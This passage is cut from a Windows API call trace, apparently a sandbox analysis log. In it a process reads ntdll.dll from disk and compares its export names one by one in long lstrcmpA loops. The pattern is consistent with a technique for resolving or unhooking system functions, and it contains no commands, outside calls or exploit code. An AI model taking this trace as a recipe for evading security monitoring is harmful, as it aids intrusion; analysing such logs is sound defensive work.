"c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0254.696] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0254.696] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0254.696] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0254.696] GetProcessHeap () returned 0x4a0000 [0254.696] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1bba48) returned 0x4157040 [0254.700] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0254.700] ReadFile (in: hFile=0x140, lpBuffer=0x4157040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4157040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0254.891] CloseHandle (hObject=0x140) returned 1 [0254.891] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0254.891] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0254.891] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0254.891] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0254.891] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0254.891] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0254.891] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0254.891] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0254.891] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0254.891] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0254.892] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0254.892] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0254.892] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0254.892] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.892] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0254.892] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0254.892] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0254.892] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0254.892] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.892] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.892] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0254.892] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0254.892] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0254.892] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0254.892] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.892] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.892] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0254.892] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0254.892] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0254.892] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0254.892] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0254.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0254.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0254.893] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.893] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0254.894] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0254.894] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0254.894] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0254.894] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0254.894] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0254.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0254.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0254.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0254.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0254.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0254.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0254.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0254.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0254.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0254.894] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0254.894] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0254.894] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0254.894] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0254.894] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.894] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.894] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0254.894] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0254.894] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0254.894] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0254.894] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0254.894] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0254.894] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0254.895] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0254.895] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0254.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0254.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0254.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0254.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0254.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0254.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0254.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0254.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0254.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0254.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0254.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0254.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0254.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0254.896] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0254.896] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0254.896] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0254.896] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0254.896] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.896] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.896] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0254.896] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0254.896] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0254.896] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0254.896] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0254.896] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0254.896] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0254.896] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0254.896] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0254.897] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0254.897] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0254.897] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0254.897] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0254.897] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.897] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.897] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0254.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0254.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0254.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0254.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0254.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0254.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0254.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0254.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0254.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0254.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0254.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0254.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0254.898] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0254.898] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0254.899] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0254.899] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0254.899] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0254.899] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0254.900] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0254.900] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0254.900] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0254.900] lstrcmpA 